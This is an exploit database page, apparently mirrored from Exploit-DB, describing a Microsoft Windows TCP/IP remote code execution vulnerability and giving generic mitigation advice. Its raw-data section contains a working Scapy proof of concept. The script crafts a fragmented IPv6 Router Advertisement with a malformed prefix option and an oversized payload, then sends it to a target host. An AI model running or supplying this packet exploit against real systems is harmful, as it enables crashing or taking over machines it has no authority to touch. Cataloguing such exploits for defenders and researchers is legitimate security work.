header-logo
Suggest Exploit
vendor:
Microsoft Windows
by:
7.5
CVSS
HIGH
Remote Code Execution
CWE
Product Name: Microsoft Windows
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows

Microsoft Windows TCP/IP Remote Code Execution Vulnerability

The Microsoft Windows TCP/IP protocol implementation is prone to a remote code-execution vulnerability. An attacker can exploit this issue to execute arbitrary code with SYSTEM-level privileges. Successful attacks will completely compromise affected computers. Failed exploit attempts will likely result in denial-of-service conditions.

Mitigation:

Apply the latest security updates provided by Microsoft to address this vulnerability. Additionally, follow security best practices such as using firewalls, implementing strong access controls, and regularly monitoring network traffic for suspicious activity.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/38061/info

Microsoft Windows TCP/IP protocol implementation is prone to a remote code-execution vulnerability.

An attacker can exploit this issue to execute arbitrary code with SYSTEM-level privileges. Successful attacks will completely compromise affected computers. Failed exploit attempts will likely result in denial-of-service conditions. 


v6_dst = "<IPv6 address>"

mac_dst = "<Mac address>"

pkt = IPv6(dst=v6_dst, hlim=255) / IPv6ExtHdrFragment() / ICMPv6ND_RA() / ICMPv6NDOptPrefixInfo(len=255, prefixlen=64, prefix="2001::") / Raw(load='A'*2008)

l=fragment6(pkt, 1500)

for p in l:
sendp(Ether(dst=mac_dst)/p, iface="eth0")

Navigation

Suggest Exploit

Services By CQR